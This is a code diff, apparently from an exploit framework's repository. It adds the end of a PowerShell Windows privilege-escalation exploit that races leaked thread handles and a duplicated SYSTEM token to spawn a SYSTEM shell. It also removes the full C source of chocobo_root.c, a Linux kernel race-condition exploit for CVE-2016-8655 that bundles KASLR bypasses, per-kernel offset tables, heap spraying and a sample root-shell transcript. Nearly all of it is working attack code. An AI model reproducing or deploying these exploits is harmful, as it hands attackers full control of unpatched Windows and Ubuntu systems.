+    $ThreadArray = @()
+    $TidArray = @()
+
+    echo "[>] Duplicating CreateProcessWithLogonW handles.."
+    # Loop Get-ThreadHandle and collect thread handles with a valid TID
+    for ($i=0; $i -lt 500; $i++) {
+        $hThread = Get-ThreadHandle
+        $hThreadID = [Kernel32]::GetThreadId($hThread)
+        # Bit hacky/lazy, filters on uniq/valid TID's to create $ThreadArray
+        if ($TidArray -notcontains $hThreadID) {
+            $TidArray += $hThreadID
+            if ($hThread -ne 0) {
+                $ThreadArray += $hThread # This is what we need!
+            }
+        }
+    }
+
+    if ($($ThreadArray.length) -eq 0) {
+        echo "[!] No valid thread handles were captured, exiting!"
+        Return
+    } else {
+        echo "[?] Done, got $($ThreadArray.length) thread handle(s)!"
+        echo "`n[?] Thread handle list:"
+        $ThreadArray
+    }
+
+    echo "`n[*] Sniffing out privileged impersonation token.."
+    foreach ($Thread in $ThreadArray){
+
+        # Get handle to SYSTEM access token
+        Get-SystemToken
+
+        echo "`n[*] Sniffing out SYSTEM shell.."
+        echo "`n[>] Duplicating SYSTEM token"
+        $hDuplicateTokenHandle = [IntPtr]::Zero
+        $CallResult = [Advapi32]::DuplicateToken($SysTokenHandle, 2, [ref]$hDuplicateTokenHandle)
+
+        # Simple PS runspace definition
+        echo "[>] Starting token race"
+        $Runspace = [runspacefactory]::CreateRunspace()
+        $StartTokenRace = [powershell]::Create()
+        $StartTokenRace.runspace = $Runspace
+        $Runspace.Open()
+        [void]$StartTokenRace.AddScript({
+            Param ($Thread, $hDuplicateTokenHandle)
+            while ($true) {
+                $CallResult = [Advapi32]::SetThreadToken([ref]$Thread, $hDuplicateTokenHandle)
+            }
+        }).AddArgument($Thread).AddArgument($hDuplicateTokenHandle)
+        $AscObj = $StartTokenRace.BeginInvoke()
+
+        echo "[>] Starting process race"
+        # Adding a timeout (10 seconds) here to safeguard from edge-cases
+        $SafeGuard = [diagnostics.stopwatch]::StartNew()
+        while ($SafeGuard.ElapsedMilliseconds -lt 10000) {
+        # StartupInfo Struct
+        $StartupInfo = New-Object STARTUPINFO
+        $StartupInfo.cb = [System.Runtime.InteropServices.Marshal]::SizeOf($StartupInfo) # Struct Size
+
+        # ProcessInfo Struct
+        $ProcessInfo = New-Object PROCESS_INFORMATION
+
+        # CreateProcessWithLogonW --> lpCurrentDirectory
+        $GetCurrentPath = (Get-Item -Path ".\" -Verbose).FullName
+
+        # LOGON_NETCREDENTIALS_ONLY / CREATE_SUSPENDED
+        $CallResult = [Advapi32]::CreateProcessWithLogonW(
+            "user", "domain", "pass",
+            0x00000002, $cmd, $args1,
+            0x00000004, $null, $GetCurrentPath,
+            [ref]$StartupInfo, [ref]$ProcessInfo)
+        $hTokenHandle = [IntPtr]::Zero
+        $CallResult = [Advapi32]::OpenProcessToken($ProcessInfo.hProcess, 0x28, [ref]$hTokenHandle)
+
+        # If we can't open the process token it's a SYSTEM shell!
+        if (!$CallResult) {
+            echo "[!] Holy handle leak Batman, we have a SYSTEM shell!!`n"
+            $CallResult = [Kernel32]::ResumeThread($ProcessInfo.hThread)
+            $StartTokenRace.Stop()
+            $SafeGuard.Stop()
+            Return
+        }
+
+        # Clean up suspended process
+        $CallResult = [Kernel32]::TerminateProcess($ProcessInfo.hProcess, 1)
+        $CallResult = [Kernel32]::CloseHandle($ProcessInfo.hProcess)
+        $CallResult = [Kernel32]::CloseHandle($ProcessInfo.hThread)
+        }
+
+        # Kill runspace & stopwatch if edge-case
+        $StartTokenRace.Stop()
+        $SafeGuard.Stop()
+    }
+    exit

data/exploits/CVE-2016-8655/chocobo_root.c

@@ -1,983 +0,0 @@
-/*
-chocobo_root.c
-linux AF_PACKET race condition exploit for CVE-2016-8655.
-Includes KASLR and SMEP bypasses. No SMAP bypass.
-For Ubuntu 14.04 / 16.04 (x86_64) kernels 4.4.0 before 4.4.0-53.74.
-All kernel offsets have been tested on Ubuntu / Linux Mint.
-
-vroom vroom
-*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=
-user@ubuntu:~$ uname -a
-Linux ubuntu 4.4.0-51-generic #72-Ubuntu SMP Thu Nov 24 18:29:54 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
-user@ubuntu:~$ id
-uid=1000(user) gid=1000(user) groups=1000(user)
-user@ubuntu:~$ gcc chocobo_root.c -o chocobo_root -lpthread -Wall
-user@ubuntu:~$ ./chocobo_root
-linux AF_PACKET race condition exploit by rebel
-kernel version: 4.4.0-51-generic #72
-proc_dostring = 0xffffffff81088090
-modprobe_path = 0xffffffff81e48f80
-register_sysctl_table = 0xffffffff812879a0
-set_memory_rw = 0xffffffff8106f320
-exploit starting
-making vsyscall page writable..
-
-new exploit attempt starting, jumping to 0xffffffff8106f320, arg=0xffffffffff600000
-sockets allocated
-removing barrier and spraying..
-version switcher stopping, x = -1 (y = 174222, last val = 2)
-current packet version = 0
-pbd->hdr.bh1.offset_to_first_pkt = 48
-*=*=*=* TPACKET_V1 && offset_to_first_pkt != 0, race won *=*=*=*
-please wait up to a few minutes for timer to be executed. if you ctrl-c now the kernel will hang. so don't do that.
-closing socket and verifying.......
-vsyscall page altered!
-
-
-stage 1 completed
-registering new sysctl..
-
-new exploit attempt starting, jumping to 0xffffffff812879a0, arg=0xffffffffff600850
-sockets allocated
-removing barrier and spraying..
-version switcher stopping, x = -1 (y = 30773, last val = 0)
-current packet version = 2
-pbd->hdr.bh1.offset_to_first_pkt = 48
-race not won
-
-retrying stage..
-new exploit attempt starting, jumping to 0xffffffff812879a0, arg=0xffffffffff600850
-sockets allocated
-removing barrier and spraying..
-version switcher stopping, x = -1 (y = 133577, last val = 2)
-current packet version = 0
-pbd->hdr.bh1.offset_to_first_pkt = 48
-*=*=*=* TPACKET_V1 && offset_to_first_pkt != 0, race won *=*=*=*
-please wait up to a few minutes for timer to be executed. if you ctrl-c now the kernel will hang. so don't do that.
-closing socket and verifying.......
-sysctl added!
-
-stage 2 completed
-binary executed by kernel, launching rootshell
-root@ubuntu:~# id
-uid=0(root) gid=0(root) groups=0(root),1000(user)
-
-*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=
-
-Shoutouts to:
-jsc for inspiration (https://www.youtube.com/watch?v=x4UDIfcYMKI)
-mcdelivery for delivering hotcakes and coffee
-
-11/2016
-by rebel
----
-Updated by <bcoles@gmail.com>
-- check number of CPU cores
-- KASLR bypasses
-- additional kernel targets
-https://github.com/bcoles/kernel-exploits/tree/master/CVE-2016-8655
-*/
-
-#define _GNU_SOURCE
-
-#include <fcntl.h>
-#include <poll.h>
-#include <pthread.h>
-#include <sched.h>
-#include <signal.h>
-#include <stdint.h>
-#include <stdio.h>
-#include <stdlib.h>
-#include <string.h>
-#include <unistd.h>
-#include <linux/if_packet.h>
-#include <netinet/in.h>
-#include <sys/klog.h>
-#include <sys/mman.h>
-#include <sys/types.h>
-#include <sys/socket.h>
-#include <sys/stat.h>
-#include <sys/syscall.h>
-#include <sys/sysinfo.h>
-#include <sys/utsname.h>
-#include <sys/wait.h>
-
-#define DEBUG
-
-#ifdef DEBUG
-#  define dprintf printf
-#else
-#  define dprintf
-#endif
-
-#define ENABLE_SYSTEM_CHECKS		1
-#define ENABLE_KASLR_BYPASS		1
-
-#if ENABLE_KASLR_BYPASS
-#  define KERNEL_BASE_MIN		0xffffffff00000000ul
-#  define KERNEL_BASE_MAX		0xffffffffff000000ul
-#  define ENABLE_KASLR_BYPASS_KALLSYMS	1
-#  define ENABLE_KASLR_BYPASS_SYSLOG	1
-#  define ENABLE_KASLR_BYPASS_MINCORE	1
-#endif
-
-// Will be overwritten if ENABLE_KASLR_BYPASS is enabled (1)
-unsigned long KERNEL_BASE = 0xffffffff81000000ul;
-
-// Will be overwritten by detect_versions()
-int kernel = -1;
-
-// New sysctl path
-const char *SYSCTL_NAME = "hack";
-const char *SYSCTL_PATH = "/proc/sys/hack";
-
-volatile int barrier = 1;
-volatile int vers_switcher_done = 0;
-
-// kernel target struct
-struct kernel_info {
-    char *kernel_version;
-    unsigned long proc_dostring;
-    unsigned long modprobe_path;
-    unsigned long register_sysctl_table;
-    unsigned long set_memory_rw;
-};
-
-// Targets
-struct kernel_info kernels[] = {
-    { "4.4.0-21-generic #37~14.04.1-Ubuntu", 0x084220, 0xc4b000, 0x273a30, 0x06b9d0 },
-    { "4.4.0-22-generic #40~14.04.1-Ubuntu", 0x084250, 0xc4b080, 0x273de0, 0x06b9d0 },
-    { "4.4.0-24-generic #43~14.04.1-Ubuntu", 0x084120, 0xc4b080, 0x2736f0, 0x06b880 },
-    { "4.4.0-28-generic #47~14.04.1-Ubuntu", 0x084160, 0xc4b100, 0x273b70, 0x06b880 },
-    { "4.4.0-31-generic #50~14.04.1-Ubuntu", 0x084160, 0xc4b100, 0x273c20, 0x06b880 },
-    { "4.4.0-34-generic #53~14.04.1-Ubuntu", 0x084160, 0xc4b100, 0x273c40, 0x06b880 },
-    { "4.4.0-36-generic #55~14.04.1-Ubuntu", 0x084160, 0xc4b100, 0x273c60, 0x06b890 },
-    { "4.4.0-38-generic #57~14.04.1-Ubuntu", 0x084210, 0xe4b100, 0x2742e0, 0x06b890 },
-    { "4.4.0-42-generic #62~14.04.1-Ubuntu", 0x084260, 0xe4b100, 0x274300, 0x06b880 },
-    { "4.4.0-45-generic #66~14.04.1-Ubuntu", 0x084260, 0xe4b100, 0x274340, 0x06b880 },
-    //{"4.4.0-46-generic #67~14.04.1-Ubuntu",0x0842f0,0xe4b100,0x274580,0x06b880},
-    { "4.4.0-47-generic #68~14.04.1-Ubuntu", 0x0842f0, 0xe4b100, 0x274580, 0x06b880 },
-    //{"4.4.0-49-generic #70~14.04.1-Ubuntu",0x084350,0xe4b100,0x274b10,0x06b880},
-    { "4.4.0-51-generic #72~14.04.1-Ubuntu", 0x084350, 0xe4b100, 0x274750, 0x06b880 },
-
-    { "4.4.0-21-generic #37-Ubuntu", 0x087cf0, 0xe48e80, 0x286310, 0x06f370 },
-    { "4.4.0-22-generic #40-Ubuntu", 0x087d40, 0xe48f00, 0x2864d0, 0x06f370 },
-    { "4.4.0-24-generic #43-Ubuntu", 0x087e60, 0xe48f00, 0x2868f0, 0x06f370 },
-    { "4.4.0-28-generic #47-Ubuntu", 0x087ea0, 0xe48f80, 0x286df0, 0x06f370 },
-    { "4.4.0-31-generic #50-Ubuntu", 0x087ea0, 0xe48f80, 0x286e90, 0x06f370 },
-    { "4.4.0-34-generic #53-Ubuntu", 0x087ea0, 0xe48f80, 0x286ed0, 0x06f370 },
-    { "4.4.0-36-generic #55-Ubuntu", 0x087ea0, 0xe48f80, 0x286e50, 0x06f360 },
-    { "4.4.0-38-generic #57-Ubuntu", 0x087f70, 0xe48f80, 0x287470, 0x06f360 },
-    { "4.4.0-42-generic #62-Ubuntu", 0x087fc0, 0xe48f80, 0x2874a0, 0x06f320 },
-    { "4.4.0-43-generic #63-Ubuntu", 0x087fc0, 0xe48f80, 0x2874b0, 0x06f320 },
-    { "4.4.0-45-generic #66-Ubuntu", 0x087fc0, 0xe48f80, 0x2874c0, 0x06f320 },
-    //{"4.4.0-46-generic #67-Ubuntu",0x088040,0xe48f80,0x287800,0x06f320},
-    { "4.4.0-47-generic #68-Ubuntu", 0x088040, 0xe48f80, 0x287800, 0x06f320 },
-    //{"4.4.0-49-generic #70-Ubuntu",0x088090,0xe48f80,0x287d40,0x06f320},
-    { "4.4.0-51-generic #72-Ubuntu", 0x088090, 0xe48f80, 0x2879a0, 0x06f320},
-
-    { "4.4.0-21-lowlatency #37-Ubuntu",  0x88960, 0xe48e80, 0x28c3a0, 0x6fae0 },
-    { "4.4.0-22-lowlatency #40-Ubuntu",  0x889c0, 0xe48f00, 0x28c570, 0x6fae0 },
-    { "4.4.0-24-lowlatency #43-Ubuntu",  0x88ae0, 0xe48f00, 0x28c9a0, 0x6fae0 },
-    { "4.4.0-28-lowlatency #47-Ubuntu",  0x88b20, 0xe48f80, 0x28ce20, 0x6fae0 },
-    { "4.4.0-31-lowlatency #50-Ubuntu",  0x88b20, 0xe48f80, 0x28cf10, 0x6fae0 },
-    { "4.4.0-34-lowlatency #53-Ubuntu",  0x88b20, 0xe48f80, 0x28cf50, 0x6fae0 },
-    { "4.4.0-36-lowlatency #55-Ubuntu",  0x88b00, 0xe48f80, 0x28cf30, 0x6fad0 },
-    { "4.4.0-38-lowlatency #57-Ubuntu",  0x88bd0, 0xe48f80, 0x28d580, 0x6fad0 },
-    { "4.4.0-42-lowlatency #62-Ubuntu",  0x88c30, 0xe48f80, 0x28d5b0, 0x6faa0 },
-};
-
-#define VSYSCALL              0xffffffffff600000
-#define PROC_DOSTRING         (KERNEL_BASE + kernels[kernel].proc_dostring)
-#define MODPROBE_PATH         (KERNEL_BASE + kernels[kernel].modprobe_path)
-#define REGISTER_SYSCTL_TABLE (KERNEL_BASE + kernels[kernel].register_sysctl_table)
-#define SET_MEMORY_RW         (KERNEL_BASE + kernels[kernel].set_memory_rw)
-
-#define KMALLOC_PAD 64
-
-int pad_fds[KMALLOC_PAD];
-
-// * * * * * * * * * * * * * * Kernel structs * * * * * * * * * * * * * * * *
-
-struct ctl_table {
-    const char *procname;
-    void *data;
-    int maxlen;
-    unsigned short mode;
-    struct ctl_table *child;
-    void *proc_handler;
-    void *poll;
-    void *extra1;
-    void *extra2;
-};
-
-#define CONF_RING_FRAMES 1
-
-struct tpacket_req3 tp;
-int sfd;
-int mapped = 0;
-
-// timer_list struct defined in: include/linux/timer.h
-struct timer_list {
-    void *next;
-    void *prev;
-    unsigned long           expires;
-    void                    (*function)(unsigned long);
-    unsigned long           data;
-    unsigned int            flags;
-    int                     slack;
-};
-
-// * * * * * * * * * * * * * * * Helpers * * * * * * * * * * * * * * * * * *
-
-void *setsockopt_thread(void *arg)
-{
-    while (barrier) {}
-    setsockopt(sfd, SOL_PACKET, PACKET_RX_RING, (void*) &tp, sizeof(tp));
-
-    return NULL;
-}
-
-void *vers_switcher(void *arg)
-{
-    int val,x,y;
-
-    while (barrier) {}
-
-    while (1) {
-        val = TPACKET_V1;
-        x = setsockopt(sfd, SOL_PACKET, PACKET_VERSION, &val, sizeof(val));
-
-        y++;
-
-        if (x != 0) break;
-
-        val = TPACKET_V3;
-        x = setsockopt(sfd, SOL_PACKET, PACKET_VERSION, &val, sizeof(val));
-
-        if (x != 0) break;
-
-        y++;
-    }
-
-    dprintf("[.] version switcher stopping, x = %d (y = %d, last val = %d)\n",x,y,val);
-    vers_switcher_done = 1;
-
-    return NULL;
-}
-
-// * * * * * * * * * * * * * * Heap shaping * * * * * * * * * * * * * * * * *
-
-#define BUFSIZE 1408
-char exploitbuf[BUFSIZE];
-
-#ifndef ETH_P_ARP
-#    define ETH_P_ARP 0x0806
-#endif
-
-void kmalloc(void)
-{
-    while(1)
-        syscall(__NR_add_key, "user", "wtf", exploitbuf, BUFSIZE - 24, -2);
-}
-
-void pad_kmalloc(void)
-{
-    int x;
-    for (x = 0; x < KMALLOC_PAD; x++)
-        if (socket(AF_PACKET, SOCK_DGRAM, htons(ETH_P_ARP)) == -1) {
-            dprintf("[-] pad_kmalloc() socket error: %m\n");
-            exit(EXIT_FAILURE);
-        }
-}
-
-// * * * * * * * * * * * * * * * Trigger * * * * * * * * * * * * * * * * * *
-
-int try_exploit(unsigned long func, unsigned long arg, void *verification_func)
-{
-    pthread_t setsockopt_thread_thread,a;
-    int val;
-    socklen_t l;
-    struct timer_list *timer;
-    int fd;
-    struct tpacket_block_desc *pbd;
-    int off;
-    sigset_t set;
-
-    sigemptyset(&set);
-
-    sigaddset(&set, SIGSEGV);
-
-    if (pthread_sigmask(SIG_BLOCK, &set, NULL) != 0) {
-        dprintf("[-] couldn't set sigmask: %m\n");
-        exit(1);
-    }
-
-    dprintf("[.] new exploit attempt starting, jumping to %p, arg=%p\n", (void *)func, (void *)arg);
-
-    pad_kmalloc();
-
-    fd = socket(AF_PACKET, SOCK_DGRAM, htons(ETH_P_ARP));
-
-    if (fd == -1) {
-        dprintf("[-] target socket error: %m\n");
-        exit(1);
-    }
-
-    pad_kmalloc();
-
-    dprintf("[.] done, sockets allocated\n");
-
-    val = TPACKET_V3;
-
-    setsockopt(fd, SOL_PACKET, PACKET_VERSION, &val, sizeof(val));
-
-    tp.tp_block_size = CONF_RING_FRAMES * getpagesize();
-    tp.tp_block_nr = 1;
-    tp.tp_frame_size = getpagesize();
-    tp.tp_frame_nr = CONF_RING_FRAMES;
-
-    // try to set the timeout to 10 seconds
-    // the default timeout might still be used though depending on when the race was won
-    tp.tp_retire_blk_tov = 10000;
-
-    sfd = fd;
-
-    if (pthread_create(&setsockopt_thread_thread, NULL, setsockopt_thread, (void *)NULL)) {
-        dprintf("[-] Error creating thread: %m\n");
-        return 1;
-    }
-
-    pthread_create(&a, NULL, vers_switcher, (void *)NULL);
-
-    usleep(200000);
-
-    dprintf("[.] removing barrier and spraying...\n");
-
-    memset(exploitbuf, '\x00', BUFSIZE);
-
-    timer = (struct timer_list *)(exploitbuf+(0x6c*8)+6-8);
-    timer->next = 0;
-    timer->prev = 0;
-
-    timer->expires = 4294943360;
-    timer->function = (void *)func;
-    timer->data = arg;
-    timer->flags = 1;
-    timer->slack = -1;
-
-    barrier = 0;
-
-    usleep(100000);
-
-    while (!vers_switcher_done) usleep(100000);
-
-    l = sizeof(val);
-    getsockopt(sfd, SOL_PACKET, PACKET_VERSION, &val, &l);
-
-    dprintf("[.] current packet version = %d\n",val);
-
-    pbd = mmap(0, tp.tp_block_size * tp.tp_block_nr, PROT_READ | PROT_WRITE, MAP_SHARED, sfd, 0);
-
-    if (pbd == MAP_FAILED) {
-        dprintf("[-] could not map pbd: %m\n");
-        exit(1);
-    } else {
-        off = pbd->hdr.bh1.offset_to_first_pkt;
-        dprintf("[.] pbd->hdr.bh1.offset_to_first_pkt = %d\n", off);
-    }
-
-
-    if (val == TPACKET_V1 && off != 0) {
-        dprintf("*=*=*=* TPACKET_V1 && offset_to_first_pkt != 0, race won *=*=*=*\n");
-    } else {
-        dprintf("[-] race not won\n");
-        exit(2);
-    }
-
-    munmap(pbd, tp.tp_block_size * tp.tp_block_nr);
-
-    pthread_create(&a, NULL, verification_func, (void *)NULL);
-
-    dprintf("\n");
-    dprintf("[!] please wait up to a few minutes for timer to be executed.\n");
-    dprintf("[!] if you ctrl-c now the kernel will hang. so don't do that.\n");
-    dprintf("\n");
-
-    sleep(1);
-    dprintf("[.] closing socket and verifying...\n");
-
-    close(sfd);
-
-    kmalloc();
-
-    dprintf("[.] all messages sent\n");
-
-    sleep(31337);
-    exit(1);
-}
-
-int verification_result = 0;
-
-void catch_sigsegv(int sig)
-{
-    verification_result = 0;
-    pthread_exit((void *)1);
-}
-
-void *modify_vsyscall(void *arg)
-{
-    unsigned long *vsyscall = (unsigned long *)(VSYSCALL+0x850);
-    unsigned long x = (unsigned long)arg;
-
-    sigset_t set;
-    sigemptyset(&set);
-    sigaddset(&set, SIGSEGV);
-
-    if (pthread_sigmask(SIG_UNBLOCK, &set, NULL) != 0) {
-        dprintf("[-] couldn't set sigmask: %m\n");
-        exit(EXIT_FAILURE);
-    }
-
-    signal(SIGSEGV, catch_sigsegv);
-
-    *vsyscall = 0xdeadbeef + x;
-
-    if (*vsyscall == 0xdeadbeef+x) {
-        dprintf("[~] vsyscall page altered!\n");
-        verification_result = 1;
-        pthread_exit(0);
-    }
-
-    return NULL;
-}
-
-void verify_stage1(void)
-{
-    pthread_t v_thread;
-
-    sleep(5);
-
-    int x;
-    for(x = 0; x < 300; x++) {
-
-        pthread_create(&v_thread, NULL, modify_vsyscall, 0);
-
-        pthread_join(v_thread, NULL);
-
-        if(verification_result == 1) {
-            exit(0);
-        }
-
-        write(2, ".", 1);
-        sleep(1);
-    }
-
-    dprintf("[-] could not modify vsyscall\n");
-    exit(EXIT_FAILURE);
-}
-
-void verify_stage2(void)
-{
-    struct stat b;
-
-    sleep(5);
-
-    int x;
-    for(x = 0; x < 300; x++) {
-
-        if (stat(SYSCTL_PATH, &b) == 0) {
-            dprintf("[~] sysctl added!\n");
-            exit(0);
-        }
-
-        write(2, ".", 1);
-        sleep(1);
-    }
-
-    dprintf("[-] could not add sysctl\n");
-    exit(EXIT_FAILURE);
-}
-
-void exploit(unsigned long func, unsigned long arg, void *verification_func)
-{
-    int status;
-    int pid;
-
-retry:
-
-    pid = fork();
-
-    if (pid == 0) {
-        try_exploit(func, arg, verification_func);
-        exit(1);
-    }
-
-    wait(&status);
-
-    dprintf("\n");
-
-    if (WEXITSTATUS(status) == 2) {
-        dprintf("[.] retrying stage...\n");
-        kill(pid, 9);
-        sleep(2);
-        goto retry;
-    }
-
-    if (WEXITSTATUS(status) != 0) {
-        dprintf("[-] something bad happened, aborting exploit attempt\n");
-        exit(EXIT_FAILURE);
-    }
-
-    kill(pid, 9);
-}
-
-
-void wrapper(void)
-{
-    struct ctl_table *c;
-
-    dprintf("[.] making vsyscall page writable...\n\n");
-
-    exploit(SET_MEMORY_RW, VSYSCALL, verify_stage1);
-
-    dprintf("[~] done, stage 1 completed\n");
-
-    sleep(5);
-
-    dprintf("[.] registering new sysctl...\n\n");
-
-    c = (struct ctl_table *)(VSYSCALL+0x850);
-
-    memset((char *)(VSYSCALL+0x850), '\x00', 1952);
-
-    strcpy((char *)(VSYSCALL+0xf00), SYSCTL_NAME);
-    memcpy((char *)(VSYSCALL+0xe00), "\x01\x00\x00\x00",4);
-    c->procname = (char *)(VSYSCALL+0xf00);
-    c->mode = 0666;
-    c->proc_handler = (void *)(PROC_DOSTRING);
-    c->data = (void *)(MODPROBE_PATH);
-    c->maxlen = 256;
-    c->extra1 = (void *)(VSYSCALL+0xe00);
-    c->extra2 = (void *)(VSYSCALL+0xd00);
-
-    exploit(REGISTER_SYSCTL_TABLE, VSYSCALL+0x850, verify_stage2);
-
-    dprintf("[~] done, stage 2 completed\n");
-}
-
-// * * * * * * * * * * * * * * * * * Detect * * * * * * * * * * * * * * * * *
-
-#define CHUNK_SIZE 1024
-
-int read_file(const char* file, char* buffer, int max_length) {
-    int f = open(file, O_RDONLY);
-    if (f == -1)
-        return -1;
-    int bytes_read = 0;
-    while (1) {
-        int bytes_to_read = CHUNK_SIZE;
-        if (bytes_to_read > max_length - bytes_read)
-            bytes_to_read = max_length - bytes_read;
-        int rv = read(f, &buffer[bytes_read], bytes_to_read);
-        if (rv == -1)
-            return -1;
-        bytes_read += rv;
-        if (rv == 0)
-            return bytes_read;
-    }
-}
-
-#define PROC_CPUINFO_LENGTH 4096
-
-void check_env() {
-    int min_procs = 2;
-
-    int nprocs = 0;
-    nprocs = get_nprocs_conf();
-
-    if (nprocs < min_procs) {
-        dprintf("[-] system has less than %d processor cores\n", min_procs);
-        exit(EXIT_FAILURE);
-    }
-
-    char buffer[PROC_CPUINFO_LENGTH];
-    char* path = "/proc/cpuinfo";
-    int length = read_file(path, &buffer[0], PROC_CPUINFO_LENGTH);
-    if (length == -1) {
-        dprintf("[-] open/read(%s): %m\n", path);
-        exit(EXIT_FAILURE);
-    }
-
-    char* found = memmem(&buffer[0], length, "smap", 4);
-    if (found != NULL) {
-        dprintf("[-] SMAP detected, no bypass available\n");
-        exit(EXIT_FAILURE);
-    }
-
-    struct stat st;
-    if (stat("/dev/grsec", &st) == 0) {
-        dprintf("[!] Warning: grsec is in use\n");
-    }
-}
-
-struct utsname get_kernel_version() {
-    struct utsname u;
-    int rv = uname(&u);
-    if (rv != 0) {
-        dprintf("[-] uname())\n");
-        exit(EXIT_FAILURE);
-    }
-    return u;
-}
-
-#define ARRAY_SIZE(x) (sizeof(x) / sizeof((x)[0]))
-#define KERNEL_VERSION_SIZE_BUFFER 512
-
-void detect_versions() {
-    struct utsname u;
-    char kernel_version[KERNEL_VERSION_SIZE_BUFFER];
-
-    u = get_kernel_version();
-
-    if (strstr(u.machine, "64") == NULL) {
-        dprintf("[-] system is not using a 64-bit kernel\n");
-        exit(EXIT_FAILURE);
-    }
-
-    if (strstr(u.version, "-Ubuntu") == NULL) {
-        dprintf("[-] system is not using an Ubuntu kernel\n");
-        exit(EXIT_FAILURE);
-    }
-
-    char *u_ver = strtok(u.version, " ");
-    snprintf(kernel_version, KERNEL_VERSION_SIZE_BUFFER, "%s %s", u.release, u_ver);
-
-    int i;
-    for (i = 0; i < ARRAY_SIZE(kernels); i++) {
-        if (strcmp(kernel_version, kernels[i].kernel_version) == 0) {
-            dprintf("[.] kernel version '%s' detected\n", kernels[i].kernel_version);
-            kernel = i;
-            return;
-        }
-    }
-
-    dprintf("[-] kernel version not recognized\n");
-    exit(EXIT_FAILURE);
-}
-
-// * * * * * * * * * * * * * * syslog KASLR bypass * * * * * * * * * * * * * *
-// https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-1000112/poc.c
-
-#if ENABLE_KASLR_BYPASS_SYSLOG
-#define SYSLOG_ACTION_READ_ALL 3
-#define SYSLOG_ACTION_SIZE_BUFFER 10
-
-int mmap_syslog(char** buffer, int* size) {
-    *size = klogctl(SYSLOG_ACTION_SIZE_BUFFER, 0, 0);
-    if (*size == -1) {
-        dprintf("[-] klogctl(SYSLOG_ACTION_SIZE_BUFFER)\n");
-        return 0;
-    }
-
-    *size = (*size / getpagesize() + 1) * getpagesize();
-    *buffer = (char*)mmap(NULL, *size, PROT_READ | PROT_WRITE,
-                   MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
-
-    *size = klogctl(SYSLOG_ACTION_READ_ALL, &((*buffer)[0]), *size);
-    if (*size == -1) {
-        dprintf("[-] klogctl(SYSLOG_ACTION_READ_ALL)\n");
-        return 0;
-    }
-
-    return 1;
-}
-
-unsigned long get_kernel_addr_trusty(char* buffer, int size) {
-    const char* needle1 = "Freeing unused";
-    char* substr = (char*)memmem(&buffer[0], size, needle1, strlen(needle1));
-    if (substr == NULL)
-        return 0;
-
-    int start = 0;
-    int end = 0;
-    for (end = start; substr[end] != '-'; end++);
-
-    const char* needle2 = "ffffff";
-    substr = (char*)memmem(&substr[start], end - start, needle2, strlen(needle2));
-    if (substr == NULL)
-        return 0;
-
-    char* endptr = &substr[16];
-    unsigned long addr = strtoul(&substr[0], &endptr, 16);
-
-    addr &= 0xffffffffff000000ul;
-
-    if (addr > KERNEL_BASE_MIN && addr < KERNEL_BASE_MAX)
-        return addr;
-
-    return 0;
-}
-
-unsigned long get_kernel_addr_xenial(char* buffer, int size) {
-    const char* needle1 = "Freeing unused";
-    char* substr = (char*)memmem(&buffer[0], size, needle1, strlen(needle1));
-    if (substr == NULL)
-        return 0;
-
-    int start = 0;
-    int end = 0;
-    for (start = 0; substr[start] != '-'; start++);
-    for (end = start; substr[end] != '\n'; end++);
-
-    const char* needle2 = "ffffff";
-    substr = (char*)memmem(&substr[start], end - start, needle2, strlen(needle2));
-    if (substr == NULL)
-        return 0;
-
-    char* endptr = &substr[16];
-    unsigned long addr = strtoul(&substr[0], &endptr, 16);
-
-    addr &= 0xfffffffffff00000ul;
-    addr -= 0x1000000ul;
-
-    if (addr > KERNEL_BASE_MIN && addr < KERNEL_BASE_MAX)
-        return addr;
-
-    return 0;
-}
-
-unsigned long get_kernel_addr_syslog() {
-    unsigned long addr = 0;
-    char* syslog;
-    int size;
-
-    dprintf("[.] trying syslog...\n");
-
-    if (!mmap_syslog(&syslog, &size))
-        return 0;
-
-    if (strstr(kernels[kernel].kernel_version, "14.04.1") != NULL)
-        addr = get_kernel_addr_trusty(syslog, size);
-    else
-        addr = get_kernel_addr_xenial(syslog, size);
-
-    if (!addr)
-        dprintf("[-] kernel base not found in syslog\n");
-
-    return addr;
-}
-#endif
-
-// * * * * * * * * * * * * * * kallsyms KASLR bypass * * * * * * * * * * * * * *
-// https://grsecurity.net/~spender/exploits/exploit.txt
-
-#if ENABLE_KASLR_BYPASS_KALLSYMS
-unsigned long get_kernel_addr_kallsyms() {
-    FILE *f;
-    unsigned long addr = 0;
-    char dummy;
-    char sname[256];
-    char* name = "startup_64";
-    char* path = "/proc/kallsyms";
-
-    dprintf("[.] trying %s...\n", path);
-    f = fopen(path, "r");
-    if (f == NULL) {
-        dprintf("[-] open/read(%s): %m\n", path);
-        return 0;
-    }
-
-    int ret = 0;
-    while (ret != EOF) {
-        ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
-        if (ret == 0) {
-            fscanf(f, "%s\n", sname);
-            continue;
-        }
-        if (!strcmp(name, sname)) {
-            fclose(f);
-            return addr;
-        }
-    }
-
-    fclose(f);
-    dprintf("[-] kernel base not found in %s\n", path);
-    return 0;
-}
-#endif
-
-// * * * * * * * * * * * * * * mincore KASLR bypass * * * * * * * * * * * * * *
-// https://bugs.chromium.org/p/project-zero/issues/detail?id=1431
-
-#if ENABLE_KASLR_BYPASS_MINCORE
-unsigned long get_kernel_addr_mincore() {
-    unsigned char buf[getpagesize() / sizeof(unsigned char)];
-    unsigned long iterations = 20000000;
-    unsigned long addr = 0;
-
-    dprintf("[.] trying mincore info leak...\n");
-
-    /* A MAP_ANONYMOUS | MAP_HUGETLB mapping */
-    if (mmap((void*)0x66000000, 0x20000000000, PROT_NONE,
-          MAP_SHARED | MAP_ANONYMOUS | MAP_HUGETLB | MAP_NORESERVE, -1, 0) == MAP_FAILED) {
-        dprintf("[-] mmap(): %m\n");
-        return 0;
-    }
-
-    int i;
-    for (i = 0; i <= iterations; i++) {
-        /* Touch a mishandle with this type mapping */
-        if (mincore((void*)0x86000000, 0x1000000, buf)) {
-            dprintf("[-] mincore(): %m\n");
-            return 0;
-        }
-
-        int n;
-        for (n = 0; n < getpagesize() / sizeof(unsigned char); n++) {
-            addr = *(unsigned long*)(&buf[n]);
